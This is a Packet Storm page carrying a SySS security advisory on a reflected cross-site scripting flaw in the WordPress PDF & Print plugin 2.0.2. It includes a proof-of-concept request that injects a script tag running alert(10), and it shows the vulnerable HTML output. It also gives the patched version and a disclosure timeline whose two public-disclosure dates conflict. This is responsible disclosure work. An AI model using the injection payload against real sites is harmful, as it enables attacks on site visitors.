exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress PDF And Print 2.0.2 Cross Site Scripting

WordPress PDF And Print 2.0.2 Cross Site Scripting
Posted Sep 30, 2018
Authored by Robin Trost | Site syss.de

WordPress PDF and Print plugin version 2.0.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | fcae867a09c590198715653a584ec1ce21b7b4834e7ee4461aa6b1f6848f7b8c

WordPress PDF And Print 2.0.2 Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-014
Product: PDF & Print
Manufacturer: Bestwebsoft
Affected Version: 2.0.2
Tested Version: 2.0.2
Vulnerability Type: Cross-Site-Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2018-08-24
Solution Date: 2018-09-13
Public Disclosure: 2018-09-28
CVE Reference: -
Author of Advisory: Robin Trost, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

PDF & Print is a Wordpress Plugin which allows a user to generate a PDF
file from the Blog post or print it.

The manufacturer describes the product as follows (see [1]):

"With this plugin you can create PDF files and print pages quickly.
Add PDF & print buttons to WordPress website pages, posts, and widgets.
Generate documents with custom styles and useful data for archiving,
sharing, or saving."

Due to improper encoding the plugin is vulnerable to reflected
cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The called URL gets reflected in the <href> tag for the "View PDF" and
"Print Content" Buttons.
Because the GET-parameter names did not get encoded it is possible to
execute JavaScript trough the URL.

The value of the GET-parameter is encoded correctly, but the name of
the GET-parameter is not encoded which leads to the
Cross-Site-Scripting.

This vulnerability affects all Blog Posts or Wordpress Sites where the
"View PDF" or "Print Content" Button is displayed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):


GET /index.php/2018/07/25/hello-world/?param1=10"><&10"><script>alert
(10);</script><href=" HTTP/1.1
[...]


That request results in the <script> tag from the URI Path being
embedded in the response in two places so that a browser will execute
the JavaScript code.


[...]
<div class="pdfprnt-buttons pdfprnt-buttons-post pdfprnt-top-right">
<a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
&print=pdf" class="pdfprnt-button pdfprnt-button-pdf" target=
"_blank">
<img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
pdf-print/images/pdf.png" alt="image_pdf" title="View PDF" />
</a>
<a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
&print=print" class="pdfprnt-button pdfprnt-button-print" target=
"_blank">
<img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
pdf-print/images/print.png" alt="image_print" title="Print
Content" />
</a>
</div>
[...]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 2.0.3 of PDF & Print

More Information:

https://bestwebsoft.com/products/wordpress/plugins/pdf-print/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-08-24: Vulnerability reported to manufacturer
2018-09-13: Patch released by manufacturer
2018-10-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PDF & Print
https://bestwebsoft.com/products/wordpress/plugins/pdf-print/
[2] SySS Security Advisory SYSS-2018-014
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/
SYSS-2018-014.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Robin Trost of SySS
GmbH.

E-Mail: robin.trost at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/
Robin_Trost.asc
Key ID: 0x698E6EB3
Key Fingerprint: 85FE 80E2 04F3 6177 C61A 4618 61DE F14F 698E 6EB3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEhf6A4gTzYXfGGkYYYd7xT2mObrMFAlut4ccACgkQYd7xT2mO
brObOhAAl+WrB0zN0LquBAIPenAln2KyyeyoIVlIqavqfnop/t5RHruZdY1KVAQ6
0kcTLi/177eAE0Wzwi6GZunfLKiYR4yHdSQEKJ3FUCxY/sj9SvgQQFS7+3bKZRsw
ojTG+0J9yklBmVZwBmIoV77Ca9d5qgd44tvfff3OCV1zsIPE91FYb8gNsT7MRHwp
3aw7tFd9xjwpoV/aERXPEURPrGCWC71SS0r5M1aEh5n65gF77HecWZeB2LNodJpI
Q5AHd+8fRtfdagLaBe4ws9qQdB+M7FqUcCPSXnRBsyBSr/4DRa1cl5I/i3AMr81K
m82tmGtflk62YPTQ0EXINw7LLvFOX0sSTK8z/M6vii3O6aBu03Aj1irlixZqDJa5
CTRvXBBXzA35oUJw9Usi+RjG+90PTizOd5HetDWx4k5UEdnYWwNlICN9iIBZHPOo
1b7yqX9E7FIB8elgjphaNpAr2NHyWZS0MeFNi7MAemfWWkrV4st6uHXYJYzvueNH
LnUff8QrE3sVWR+6n7PH+c9IcSU9QvCZg67U0Sg90CSs87eTHLE+IHJ2VmycXTm+
IWPR7EU5PYUMsm8MzcCYNjE4Bxq0Jwx5w8/MXKi0PXvCCrf+zR8Y/bjBaoAy4PUy
s7Z80TFrzQVy4r6xzyWOzJTKe+5ncjWLZYrkAsVGr+W+zhQsGFQ=
=bW9N
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close